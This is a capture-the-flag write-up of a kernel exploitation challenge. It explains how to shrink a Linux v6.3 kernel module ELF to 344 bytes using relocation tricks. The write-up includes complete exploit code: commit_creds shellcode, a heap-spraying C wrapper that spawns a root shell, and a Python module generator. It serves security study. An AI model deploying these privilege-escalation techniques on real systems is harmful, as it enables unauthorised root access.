idekCTF 2024

Writeup of pwn/kernel module golf from idekCTF 2024.

overview

handout: kernel-module-golf.tar.gz

We’re an unprivileged user on a v6.3.0 Linux kernel. There’s a custom device driver that allows us to insert our own loadable kernel module (LKM) with a maximum size of 345 bytes. Becoming root with just a few bytes of ring 0 shellcode is easy enough, but there are many sanity checks on LKMs (which are in ELF format) before their code is actually executed.

The challenge description links to this tmpout article, which lays some foundations for LKM golfing (on v5.15) and concludes with an 800 byte hello world module. It’s possible to reduce this much further. Note, however, that additional checks have recently been added that make this challenge impossible on the latest version of Linux, so the solution and the ELF processing code we will be analyzing (mostly under kernel/module/main.c) are specific to v6.3.

load_module

The load_module kernel function is responsible for loading an LKM. It performs entirely custom ELF validation, relocation, and execution, so existing techniques for execve ELF golfing are not very applicable. This is the function that the challenge’s device driver calls with our input.

    if (len > 345) {
        goto done;
    }
    if (0 != copy_from_user(&args, (void *)arg, sizeof(args))) {
        goto done;
    }
    info.len = len;
    info.hdr = kmalloc(info.len, GFP_KERNEL | __GFP_NOWARN);
    if (!info.hdr) {
        goto done;
    }
    if (0 != copy_from_user(info.hdr, (void *)args.module, info.len)) {
        goto release_hdr;
    }
    ret = load_module(&info, args.uargs, 0);

The main argument to load_module is struct load_info *info, which initially contains the length of our module in info->len and a pointer to our ELF data in info->hdr. load_module makes a series of function calls for setup, ending with a call to do_init_module. The functions most important to us, in the order they’re called, are elf_validity_check, setup_load_info, layout_and_allocate, apply_relocations, post_relocation, and complete_formation.

My first thought was that despite the size limit of 345 bytes, due to the presence of our module data on the heap in kmalloc-512, we could spray some objects to reliably control 1024 bytes of data and use the same module provided in the tmpout article, hoping that info->len wasn’t used much. Let’s look at elf_validity_check first to see why this approach doesn’t work. I’ll also note that some familiarity with the ELF format and specifically section headers is expected for the following explanations. This wikipedia page should be a good introduction.

elf_validity_check

	/*
	 * Do basic sanity checks against the ELF header and
	 * sections.
	 */
	err = elf_validity_check(info);

Notable checks:

So far the only section required to exist is the initial SHT_NULL. The earliest offset at which the section headers (located by e_shoff) can overlap the ELF header is 0x10, so that the null section’s fields that must be zero line up with zeroed header fields. 0xf could work, but this makes the sh_name field very large due to the enforced 0x3e e_machine field, causing a fault later when the module symtab processing offsets a heap pointer with this value.
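To make the overlap concrete, here is a small sketch that packs the ELF header the way solve.py does and then decodes the bytes at e_shoff as if they were the null section header. The three fields I treat as "must be zero" (sh_type, sh_size, sh_addr) are my reading of the v6.3 check and should be taken as an assumption. The helper name null_section_view is made up for this example.

```python
import struct

EHDR = struct.Struct("<4s5B7sHHIQQQIHHHHHH")   # Elf64_Ehdr, 0x40 bytes
SHDR = struct.Struct("<IIQQQQIIQQ")            # Elf64_Shdr, 0x40 bytes
SHDR_FIELDS = ("sh_name", "sh_type", "sh_flags", "sh_addr", "sh_offset",
               "sh_size", "sh_link", "sh_info", "sh_addralign", "sh_entsize")

def null_section_view(e_shoff):
    """Decode the section header that starts at e_shoff inside the ELF header."""
    ehdr = EHDR.pack(b"\x7fELF", 2, 1, 0, 0, 0, b"\x00" * 7,
                     1, 0x3E,          # e_type = ET_REL, e_machine = EM_X86_64
                     0,                # e_version
                     0, 0, e_shoff,    # e_entry, e_phoff, e_shoff
                     0,                # e_flags
                     0, 0, 0,          # e_ehsize, e_phentsize, e_phnum
                     0x40, 3, 1)       # e_shentsize, e_shnum, e_shstrndx
    image = ehdr + b"\x00" * 0x10      # zero padding so the overlapped header ends at 0x50
    return dict(zip(SHDR_FIELDS, SHDR.unpack_from(image, e_shoff)))

for off in (0x10, 0x0F):
    view = null_section_view(off)
    print(hex(off), {k: hex(v) for k, v in view.items()
                     if k in ("sh_name", "sh_type", "sh_addr", "sh_size")})
```

In both cases the three checked fields decode to zero. The difference is sh_name: e_type and e_machine land in its low bytes at 0x10, but shift up by one byte at 0xf, which is where the much larger name offset comes from.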

The biggest factor in reducing size is minimizing the number of sections, since their headers are placed contiguously starting at e_shoff and are 0x40 bytes each. With the mandatory null section header ending at 0x50 and our size limit of 0x159 (345), we can have at maximum 4 additional sections. Luckily, we don’t need any program headers since they’re completely ignored.
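The section budget is just integer division, sketched below with the numbers from the paragraph above. The variable names are mine.

```python
SHDR_SIZE = 0x40          # sizeof(Elf64_Shdr)
LIMIT = 345               # size cap enforced by the challenge driver
NULL_SHDR_END = 0x10 + SHDR_SIZE   # null section header overlaps the ELF header from 0x10

remaining = LIMIT - NULL_SHDR_END
max_extra_sections = remaining // SHDR_SIZE
bytes_left_for_data = remaining - max_extra_sections * SHDR_SIZE

print(hex(NULL_SHDR_END), max_extra_sections, bytes_left_for_data)
```

Four extra headers would leave almost no room for section data, which is why the rest of the writeup works on getting by with fewer.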

setup_load_info

	/*
	 * Everything checks out, so set up the section info
	 * in the info structure.
	 */
	err = setup_load_info(info, flags);

Notable checks:

Now is a good time to introduce struct module, which represents a single loaded LKM. A pointer to the “.gnu.linkonce.this_module” section’s data is assigned to info->mod (which is of type struct module *).

	info->index.mod = find_sec(info, ".gnu.linkonce.this_module");
	if (!info->index.mod) {
		pr_warn("%s: No module found in object\n",
			info->name ?: "(missing .modinfo section or name field)");
		return -ENOEXEC;
	}
	/* This is temporary: point mod into copy of data. */
	info->mod = (void *)info->hdr + info->sechdrs[info->index.mod].sh_offset;

The module struct is much larger than our 345 byte ELF, so accesses of this temporary copy will end up reading OOB data on the heap. The copy is migrated to a newly allocated section in move_module, called at the end of layout_and_allocate. Most of the fields from the temporary copy are ignored or reinitialized, so spraying heap data to fill certain fields isn’t particularly helpful, although spraying with zeroes does improve stability.

Some of the fields important to us are shown below:

	/* Startup function. */
	int (*init)(void);

	/* Core layout: rbtree is accessed frequently, so keep together. */
	struct module_layout core_layout __module_layout_align;
	struct module_layout init_layout;
#ifdef CONFIG_ARCH_WANTS_MODULES_DATA_IN_VMALLOC
	struct module_layout data_layout;
#endif

The init function pointer will be called by do_init_module at the end of load_module, so it’s how we execute shellcode. We’ll need relocs to set it to an address relative to where our module is loaded. The struct module_layout fields define memory segments.

struct module_layout {
	/* The actual code + data. */
	void *base;
	/* Total size. */
	unsigned int size;
	/* The size of the executable code.  */
	unsigned int text_size;
	/* Size of RO section of the module (text+rodata) */
	unsigned int ro_size;
	/* Size of RO after init section */
	unsigned int ro_after_init_size;

#ifdef CONFIG_MODULES_TREE_LOOKUP
	struct mod_tree_node mtn;
#endif
};

These layouts will be important for preventing crashes and ensuring that our shellcode is mapped as executable.
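Since later steps poke at individual fields of these layouts, it helps to know where each field sits. The sketch below models the leading fields of struct module_layout with ctypes, assuming x86_64 (8 byte pointers) and leaving out the trailing mod_tree_node member, which cannot change the offsets of the fields before it.

```python
import ctypes

class ModuleLayout(ctypes.Structure):
    # Leading fields of struct module_layout as shown above (x86_64 assumed).
    _fields_ = [
        ("base", ctypes.c_uint64),              # void *base
        ("size", ctypes.c_uint32),              # unsigned int size
        ("text_size", ctypes.c_uint32),         # unsigned int text_size
        ("ro_size", ctypes.c_uint32),           # unsigned int ro_size
        ("ro_after_init_size", ctypes.c_uint32),
    ]

# Map each field name to its byte offset inside the struct.
offsets = {name: getattr(ModuleLayout, name).offset
           for name, _ in ModuleLayout._fields_}

for name, off in offsets.items():
    print(f"{name:20s} +{off:#x}")
```

The useful takeaway is that text_size sits 0xc bytes after base, so once the address of a layout’s base field is known, the address of its text_size follows directly.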

Back to ELF golfing, we learned that we need an additional section for the symbol table and one section with the this_module name. We also need a strtab section to make the name lookup work. We can accomplish all of this with only one additional section. We make its type SHT_SYMTAB, make sh_offset point to the this_module string, and set its sh_name such that it becomes this_module. We then point sh_link and e_shstrndx to its index, causing it to be used as the strtab.

We don’t need any symbols for our relocs, so making our symtab point to strtab data works fine. We’ve now added an additional section header and a 26 byte string, bringing our 0x50 byte file to 0xaa (170) bytes.
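Here is a rough model of the name lookup with a single section acting as symtab, strtab, and this_module at once. The find_sec function below is my simplified reading of the kernel helper (including the SHF_ALLOC test), not a copy of it. The choice of sh_name = 4 with sh_offset backed off by 4 bytes mirrors what solve.py does. The 0x50 byte prefix is a zeroed stand-in for the real ELF header.

```python
import struct

SHDR = struct.Struct("<IIQQQQIIQQ")   # Elf64_Shdr
SHF_ALLOC = 0x2
SHT_SYMTAB = 2
NAME = b".gnu.linkonce.this_module\x00"

def c_string(buf, off):
    """Read a NUL-terminated string starting at off."""
    return buf[off:buf.index(b"\x00", off)]

def find_sec(image, e_shoff, e_shnum, e_shstrndx, wanted):
    """Return the index of the first allocated section called `wanted`, else 0."""
    hdrs = [SHDR.unpack_from(image, e_shoff + i * SHDR.size) for i in range(e_shnum)]
    secstrings = hdrs[e_shstrndx][4]          # sh_offset of the section name string table
    for i in range(1, e_shnum):
        sh_name, _, sh_flags = hdrs[i][:3]
        if sh_flags & SHF_ALLOC and c_string(image, secstrings + sh_name) == wanted:
            return i
    return 0

prefix = bytes(0x50)                  # stand-in: ELF header with the null section overlapped
str_off = len(prefix) + SHDR.size     # the name string directly follows the one extra header
symtab = SHDR.pack(4, SHT_SYMTAB, 0x42, 0, str_off - 4, len(NAME) + 4, 1, 0, 1, 0)
image = prefix + symtab + NAME

index = find_sec(image, 0x10, 2, 1, b".gnu.linkonce.this_module")
print(index, len(image))
```

Section 1 is its own string table here, so its name resolves to the string stored in its own data, and the image comes out at the 170 bytes mentioned above.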

layout_and_allocate

	/* Figure out module layout, and allocate all the memory. */
	mod = layout_and_allocate(info, flags);

layout_and_allocate first makes a call to check_modinfo, but we can ignore these checks because CONFIG_MODULE_FORCE_LOAD is enabled.

It later calls some important functions below:

	/*
	 * Determine total sizes, and put offsets in sh_entsize.  For now
	 * this is done generically; there doesn't appear to be any
	 * special cases for the architectures.
	 */
	layout_sections(info->mod, info);
	layout_symtab(info->mod, info);

	/* Allocate and move to the final place */
	err = move_module(info->mod, info);

layout_sections is benign and calculates section sizes for the layout structs. It does rewrite sh_entsize, so using that field to overlap data for relocations or shellcode isn’t possible. layout_symtab will dereference the heap strtab offset with 32 bit section names, so overlapping sh_name with large values may cause faults here. move_module allocates new memory for the module to reside permanently and copies over all sections. The copying code is shown below.

	/* Transfer each section which specifies SHF_ALLOC */
	for (i = 0; i < info->hdr->e_shnum; i++) {
		void *dest;
		Elf_Shdr *shdr = &info->sechdrs[i];

		if (!(shdr->sh_flags & SHF_ALLOC))
			continue;

		if (shdr->sh_entsize & INIT_OFFSET_MASK)
			dest = mod->init_layout.base
				+ (shdr->sh_entsize & ~INIT_OFFSET_MASK);
		else if (!(shdr->sh_flags & SHF_EXECINSTR))
			dest = mod->data_layout.base + shdr->sh_entsize;
		else
			dest = mod->core_layout.base + shdr->sh_entsize;

		if (shdr->sh_type != SHT_NOBITS)
			memcpy(dest, (void *)shdr->sh_addr, shdr->sh_size);
		/* Update sh_addr to point to copy in image. */
		shdr->sh_addr = (unsigned long)dest;
	}

Note that mod is set to the return value of layout_and_allocate to be used for the remainder of load_module.

	/* Module has been copied to its final place now: return it. */
	mod = (void *)info->sechdrs[info->index.mod].sh_addr;
	kmemleak_load_module(mod, info);
	return mod;

The sh_addr being returned was relocated by move_module. This usually isn’t an issue because the previously initialized module fields should be copied to the new location. The copying is performed per section by the memcpy call below.

memcpy(dest, (void *)shdr->sh_addr, shdr->sh_size);

sh_size for our module section is constrained to be much smaller than the full structure size, as sections are checked to be in bounds of info->len (345). Because it’s being used here as the length to copy, the majority of the new module structure fields will remain zeroed.

By breaking on the memcpy and examining the structure, we notice two pointers at offsets 0x140 and 0x190. The lack of these pointers being copied will cause faults later, but the next important function, apply_relocations, provides a solution.
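The effect of the short copy can be mimicked in a few lines. This is only a toy model: the 30 byte sh_size is the value solve.py ends up using for the module section, and the source buffer is filled with a marker byte to stand in for whatever the temporary heap copy contains.

```python
SH_SIZE = len(b".gnu.linkonce.this_module\x00") + 4   # 30, the module section's sh_size
STRUCT_SPAN = 0x200                                   # enough of struct module to cover 0x190

heap_copy = bytes([0x41]) * STRUCT_SPAN   # pretend every field of the temporary copy is set
new_mod = bytearray(STRUCT_SPAN)          # freshly allocated destination, zero-filled
new_mod[:SH_SIZE] = heap_copy[:SH_SIZE]   # models memcpy(dest, sh_addr, sh_size)

def read_u64(buf, off):
    """Read a little-endian 64 bit value at off."""
    return int.from_bytes(buf[off:off + 8], "little")

lost = {hex(off): read_u64(new_mod, off) for off in (0x140, 0x190)}
print(lost)
```

Anything past the first sh_size bytes, including both pointers, reads back as zero in the relocated structure.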

apply_relocations

Relocations make this challenge possible in multiple ways. We can write relative pointers at relative offsets from where our module is loaded to fix corrupted structures and set init to our shellcode. apply_relocations looks for an SHT_RELA section and calls apply_relocate_add with its data. This will end up calling __write_relocate_add, where a subset of the usual x86_64 relocation types are implemented. These relocations have the limitation of only being able to write to memory locations that are already zeroed.

		if (apply) {
			if (memcmp(loc, &zero, size)) {
				pr_err("x86/modules: Invalid relocation target, existing value is nonzero for type %d, loc %p, val %Lx\n",
				       (int)ELF64_R_TYPE(rel[i].r_info), loc, val);
				return -ENOEXEC;
			}
			write(loc, &val, size);
		}

The calculation for loc and val is shown below.

		/* This is where to make the change */
		loc = (void *)sechdrs[sechdrs[relsec].sh_info].sh_addr
			+ rel[i].r_offset;

		/* This is the symbol it is referring to.  Note that all
		   undefined symbols have been resolved.  */
		sym = (Elf64_Sym *)sechdrs[symindex].sh_addr
			+ ELF64_R_SYM(rel[i].r_info);

		DEBUGP("type %d st_value %Lx r_addend %Lx loc %Lx\n",
		       (int)ELF64_R_TYPE(rel[i].r_info),
		       sym->st_value, rel[i].r_addend, (u64)loc);

		val = sym->st_value + rel[i].r_addend;

The ELF64_R_SYM(...) will return 0, making val the sh_addr of the symtab plus our addend, allowing us to write any relative pointer. The relocation types we’ll be using are

		case R_X86_64_64:
			size = 8;
			break;

and

		case R_X86_64_PLT32:
			val -= (u64)loc;
			size = 4;
			break;

The PLT32/PC64 relocations subtract loc from val. Both are addresses relative to where our module is loaded, so the load address cancels out and we can write absolute values, which will be helpful for setting a size later. Otherwise, we just want the normal 8 byte relocation for writing pointers.
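The following sketch models the two relocation types and the zero check on a small byte buffer. It is a simplification under stated assumptions: sym_value stands in for whatever module-relative value sym->st_value resolves to, the bases and offsets are made-up numbers, and apply_rela is my own helper rather than kernel code.

```python
import struct

R_X86_64_64, R_X86_64_PLT32 = 1, 4
MASK64 = (1 << 64) - 1
RELA = struct.Struct("<QQQ")     # r_offset, r_info, r_addend (0x18 bytes)

def apply_rela(mem, base, sym_value, entry):
    """Apply one packed Elf64_Rela to mem, which models memory starting at base."""
    r_offset, r_info, r_addend = RELA.unpack(entry)
    rtype = r_info & 0xFFFFFFFF              # ELF64_R_TYPE; symbol index is r_info >> 32
    loc = base + r_offset
    val = (sym_value + r_addend) & MASK64
    if rtype == R_X86_64_64:
        size = 8
    elif rtype == R_X86_64_PLT32:
        val = (val - loc) & MASK64           # load address cancels out here
        size = 4
    else:
        raise ValueError("relocation type not modelled")
    off = loc - base
    if any(mem[off:off + size]):
        raise ValueError("existing value is nonzero")
    mem[off:off + size] = (val & ((1 << (8 * size)) - 1)).to_bytes(size, "little")
    return int.from_bytes(mem[off:off + size], "little")

def run(base):
    mem = bytearray(0x100)
    sym_value = base + 0x40                  # hypothetical module-relative symbol value
    ptr = apply_rela(mem, base, sym_value, RELA.pack(0x10, R_X86_64_64, 0x20))
    const = apply_rela(mem, base, sym_value, RELA.pack(0x20, R_X86_64_PLT32, 0x1000))
    return ptr, const

for base in (0xFFFFFFFFC0000000, 0xFFFFFFFFC0200000):
    ptr, const = run(base)
    print(hex(base), hex(ptr), hex(const))
```

The 8 byte relocation follows the load address, while the 4 byte one produces the same constant for both bases. Applying a second relocation to an already written location raises, which models the zero-only restriction.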

Adding an SHT_RELA section incurs 0x40 bytes for the header, and relocations are set up contiguously at 0x18 bytes each. This puts us at 234 bytes with no relocations, and a maximum of 4 relocations costing 0x60 bytes to reach 330 bytes.

Assuming we use all 4 relocations, we’ll have 15 bytes left for shellcode. The shellcode needs to fall within our rela section’s sh_size so that it’s copied into the module mappings. As long as it’s shorter than the rela size of 0x18, it won’t be parsed as a relocation, since the number of relocations to apply is calculated as sh_size / sizeof(rela).
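The running size total and the relocation count can be checked with a few lines of arithmetic. All numbers come from the text above; the variable names are mine.

```python
SHDR_SIZE = 0x40
RELA_SIZE = 0x18
LIMIT = 345

after_symtab = 0x50 + SHDR_SIZE + 26         # null header overlap + one header + name string
after_rela_hdr = after_symtab + SHDR_SIZE    # SHT_RELA section header added
after_relocs = after_rela_hdr + 4 * RELA_SIZE
tail_room = LIMIT - after_relocs             # bytes left for shellcode after the relocations

# The trailing shellcode is part of the rela section but too short to form an entry.
rela_sh_size = 4 * RELA_SIZE + tail_room
relocs_applied = rela_sh_size // RELA_SIZE

print(after_symtab, after_rela_hdr, after_relocs, tail_room, relocs_applied)
```

Integer division drops the partial fifth entry, so the trailing bytes are copied along with the section but never interpreted as a relocation.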

post_relocation

This function makes a call to add_kallsyms which will crash using the minimal module we’ve described up to this point. Some of the problematic code is shown below.

	rcu_dereference(mod->kallsyms)->typetab = mod->init_layout.base + info->init_typeoffs;

	/*
	 * Now populate the cut down core kallsyms for after init
	 * and set types up while we still have access to sections.
	 */
	mod->core_kallsyms.symtab = dst = mod->data_layout.base + info->symoffs;

mod->data_layout.base and mod->init_layout.base are null due to the copy failure earlier (these are the two pointers I mentioned). Because they were previously module relative pointers, we can rewrite their original values using two relocs to prevent the crash. The exact offsets and addends depend on the order, number, and size of the sections, but they can be easily determined in a debugger.

complete_formation

This function notably makes the following calls.

	module_enable_ro(mod, false);
	module_enable_nx(mod);
	module_enable_x(mod);

We need module_enable_x to mark our rela section as executable. This function’s code is shown below.

void module_enable_x(const struct module *mod)
{
	if (!PAGE_ALIGNED(mod->core_layout.base) ||
	    !PAGE_ALIGNED(mod->init_layout.base))
		return;

	frob_text(&mod->core_layout, set_memory_x);
	frob_text(&mod->init_layout, set_memory_x);
}

The alignment check isn’t an issue so long as we restored the original base pointers. frob_text is shown below.

static void frob_text(const struct module_layout *layout,
		      int (*set_memory)(unsigned long start, int num_pages))
{
	set_memory((unsigned long)layout->base,
		   PAGE_ALIGN(layout->text_size) >> PAGE_SHIFT);
}

text_size, which determines the number of pages to make executable, will be zero for both init_layout and core_layout due to the copy failure. The field is only 32 bits, so we’ll use the PLT32 rela to write a constant value to it. This also allows us to fit shellcode in the upper 6 bytes of our addend, bringing our shellcode total to 21 bytes.
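To see why a zero text_size is fatal, here is the page count calculation from frob_text redone in Python, assuming the usual 4 KiB pages on x86_64.

```python
PAGE_SHIFT = 12
PAGE_SIZE = 1 << PAGE_SHIFT

def page_align(x):
    """Round x up to the next multiple of PAGE_SIZE, like the kernel's PAGE_ALIGN."""
    return (x + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1)

def text_pages(text_size):
    """Number of pages frob_text would pass to set_memory_x."""
    return page_align(text_size) >> PAGE_SHIFT

for size in (0, 1, 0x1000, 0x1001):
    print(hex(size), text_pages(size))
```

With text_size left at zero, set_memory_x is asked to change zero pages, so nothing becomes executable. Any nonzero value that covers the page holding the shellcode is enough.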

do_init_module

This function marks the end of load_module and will call the function pointer in mod->init if it’s not null.

	/* Start the module */
	if (mod->init != NULL)
		ret = do_one_initcall(mod->init);

By relocating mod->init at offset 0x138 of our module struct with a pointer to our shellcode in the executable rela section, we achieve code execution. So long as our shellcode returns properly, the rest of do_init_module will run fine and we’ll return to userspace afterwards.

shellcode

The return address when our shellcode is executed is a kernel text address, so we can pop it into a register, push it back, and add some offsets to calculate other kernel addresses. My initial plan was to overwrite modprobe_path, but CONFIG_STATIC_USERMODEHELPER being enabled prevents this. Instead, I calculate the addresses of commit_creds and init_cred to call commit_creds(init_cred), making our process root when we return.

pop rbx
push rbx
add rbx, 0xb6b08
push rbx
pop rdi
add rdi, 0x199aea0
jmp rbx

This assembles to 20 bytes, although I will note that a shorter payload can be made by disabling SMAP+SMEP and jumping to userspace code. With this addition, our LKM comes to a total of 344 bytes.
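The byte counts can be double checked without an assembler. The encodings below are hand-assembled and assumed to match what pwntools emits for the listing above. The split at 6 bytes and the 0x7fb2 low half of the addend are taken from solve.py.

```python
code = bytes.fromhex(
    "5b"                # pop rbx
    "53"                # push rbx
    "4881c3086b0b00"    # add rbx, 0xb6b08
    "53"                # push rbx
    "5f"                # pop rdi
    "4881c7a0ae9901"    # add rdi, 0x199aea0
    "ffe3"              # jmp rbx
)

head, tail = code[:6], code[6:]

# The last relocation is only 4 bytes wide, so the upper 6 bytes of its
# 8 byte addend are free to carry the start of the shellcode.
addend = 0x7FB2 | (int.from_bytes(head.ljust(8, b"\x00"), "little") << 16)
packed_addend = addend.to_bytes(8, "little")

total_size = 330 + len(tail)   # file size with 4 relocations, plus the shellcode tail
print(len(code), len(head), len(tail), total_size)
```

Because the addend is the last field of the last relocation, its upper 6 bytes are immediately followed by the tail in the file, and the shellcode ends up contiguous in memory.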

solution

Once we’ve generated our LKM, we need a userspace wrapper to perform the heap spray for stability (I used msg_msg because there are no kmalloc-cg-* caches in this version) and make the device ioctl to initiate the loading. When we return from this ioctl we can spawn a root shell. The pwn.c wrapper is shown below.

#define _GNU_SOURCE
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sched.h>
#include <pthread.h>
#include <byteswap.h>
#include <poll.h>
#include <sys/utsname.h>
#include <sys/wait.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/timerfd.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/reboot.h>
#include <arpa/inet.h>
#include <sys/shm.h>
#include <sys/ioctl.h>

typedef struct  {
	long mtype;
	char mtext[1];
} msg;

int devfd;

int normal = 0;

void load(int len, char *mod, char *uarg)
{
	struct {
		char *module;
		char *uargs;
	} args;
	args.module = mod;
	args.uargs = uarg;
	ioctl(devfd, len, &args);
}

void spray(char *golf, int golf_len)
{
	char buf1[0x200], buf2[0x200];
	msg *m1 = (msg*)buf1, *m2 = (msg*)buf2;

	m1->mtype = 1;
	m2->mtype = 1;
	memcpy(m1->mtext, golf+0x30, 0x200-0x30);
	memcpy(m2->mtext, golf+0x230, 0x200-0x30);

	int qid1 = msgget(IPC_PRIVATE, 0666|IPC_CREAT);
	int qid2 = msgget(IPC_PRIVATE, 0666|IPC_CREAT);
	for (int i = 0; i < 6; i++)
		msgsnd(qid2, m2, 0x200-0x30, 0);
	msgsnd(qid1, m1, 0x200-0x30, 0);
	msgrcv(qid1, buf1, 0x200, 0, IPC_NOWAIT|MSG_NOERROR);
}

int pwn()
{
	#include "golf.c"
	spray((char*)golf, golf_len);
	load(345, (char*)golf, "ok");
	return system("id; /bin/sh");
}

int main(int argc, char **argv)
{
	/* device exposed by the challenge driver */
	devfd = open("/dev/load", O_RDWR);
	if (devfd < 0)
		return 1;
	return pwn();
}
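The offsets in spray() are easier to follow with a small model. My interpretation, which is an assumption rather than something the wrapper states, is that each message occupies a 0x200 byte slot whose first 0x30 bytes hold the kernel’s msg_msg header, so copying from golf+0x30 and golf+0x230 makes the payload land at the same offsets it has in the padded image. Whether the freed slot is actually reused for the module buffer depends on allocator state.

```python
MSG_MSG_HDR = 0x30      # assumed size of the kernel's struct msg_msg header
SLOT = 0x200            # kmalloc-512 object size

def slot_contents(golf, slot_index):
    """Bytes a sprayed message leaves in one slot (header bytes shown as 0xcc)."""
    start = slot_index * SLOT
    return b"\xcc" * MSG_MSG_HDR + golf[start + MSG_MSG_HDR:start + SLOT]

golf = bytes(i & 0xFF for i in range(0x400))   # stand-in for the 0x400 byte padded image
slot0 = slot_contents(golf, 0)   # models the m1 message (payload from golf+0x30)
slot1 = slot_contents(golf, 1)   # models each m2 message (payload from golf+0x230)

print(len(slot0), len(slot1), hex(SLOT - MSG_MSG_HDR))
```

Since the real image is zero padded past its end, most of what the spray leaves behind is zeroes, which matches the stability trick described earlier.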

And the solve.py script to generate the LKM is shown below.

#!/usr/bin/env python3

from pwn import *
import os

context.arch = "amd64"

class Ehdr():
    def __init__(self):
        self.ei_class = 2
        self.ei_data = 1
        self.ei_version = 0
        self.ei_osabi = 0
        self.ei_abiversion = 0
        self.ei_pad = b"\x00"*7
        self.e_type = 1
        self.e_machine = 0x3e
        self.e_version = 0
        self.e_entry = 0
        self.e_phoff = 0
        self.e_shoff = 0
        self.e_flags = 0
        self.e_ehsize = 0
        self.e_phentsize = 0
        self.e_phnum = 0
        self.e_shentsize = 0x40
        self.e_shnum = 0
        self.e_shstrndx = 0
    def __len__(self): return 0x40
    def create(self):
        e = b"\x7fELF"
        e += p8(self.ei_class)
        e += p8(self.ei_data)
        e += p8(self.ei_version)
        e += p8(self.ei_osabi)
        e += p8(self.ei_abiversion)
        e += self.ei_pad
        e += p16(self.e_type)
        e += p16(self.e_machine)
        e += p32(self.e_version)
        e += p64(self.e_entry)
        e += p64(self.e_phoff)
        e += p64(self.e_shoff)
        e += p32(self.e_flags)
        e += p16(self.e_ehsize)
        e += p16(self.e_phentsize)
        e += p16(self.e_phnum)
        e += p16(self.e_shentsize)
        e += p16(self.e_shnum)
        e += p16(self.e_shstrndx)
        assert len(e) == 0x40
        return e

class Shdr():
    def __init__(self, sh_type):
        self.sh_name = 0
        self.sh_type = sh_type
        self.sh_flags = 0
        self.sh_addr = 0
        self.sh_offset = 0
        self.sh_size = 0
        self.sh_link = 0
        self.sh_info = 0
        self.sh_addralign = 1
        self.sh_entsize = 0
    def __len__(self): return 0x40
    def create(self):
        e = p32(self.sh_name)
        e += p32(self.sh_type)
        e += p64(self.sh_flags)
        e += p64(self.sh_addr)
        e += p64(self.sh_offset)
        e += p64(self.sh_size)
        e += p32(self.sh_link)
        e += p32(self.sh_info)
        e += p64(self.sh_addralign)
        e += p64(self.sh_entsize)
        assert len(e) == 0x40
        return e

def mkrela(offset, info, addend=0):
    return p64(offset) + p64(info) + p64(addend)

out = b""
# calculates kernel addresses from the return address
# to call commit_creds(init_cred)
code = asm("""
    pop rbx
    push rbx
    add rbx, 0xb6b08
    push rbx
    pop rdi
    add rdi, 0x199aea0
    jmp rbx
""")

ehdr = Ehdr()
ehdr.e_shoff = 0x10
ehdr.e_shstrndx = 1
ehdr.e_shnum = 3

strtab = b".gnu.linkonce.this_module\x00"
symtab = Shdr(2)
symtab.sh_size = len(strtab)+4
symtab.sh_flags = 0x42
symtab.sh_name = 4
symtab.sh_link = 1

# relocate init to our shellcode
rela0 = mkrela(0x3138, 1, 0x2df8+0x78)
# set init_layout.base to not segfault
rela1 = mkrela(0x3190, 1, 0x2df8)
# set data_layout.base to not segfault
rela2 = mkrela(0x3140, 1, 0x4df8)
# set init_layout.text_size so our segment is marked executable,
# also fit some shellcode in here since it's a 4 byte reloc with an 8 byte addend
rela3 = mkrela(0x319c, 4, 0x7fb2|(u64(code[:6].ljust(8, b"\x00"))<<0x10))

relas = Shdr(4)
relas.sh_size = len(rela0)*4 + len(code)-6
relas.sh_flags = 2
relas.sh_info = 2

out += ehdr.create() + b"\x00"*0x10
data = b""
total = len(out) + len(symtab)*2

symtab.sh_offset = total-4
data += strtab
total += len(strtab)

relas.sh_offset = total
data += rela0 + rela1 + rela2 + rela3
data += code[6:]

out += symtab.create() + relas.create() + data
print(len(out))
# null heap spray for stability
out = out.ljust(0x400, b"\x00")

with open("golf", "wb") as f:
    f.write(out)

os.system("xxd -i golf >golf.c")

Huge props to the author unvariant for such an amazing challenge.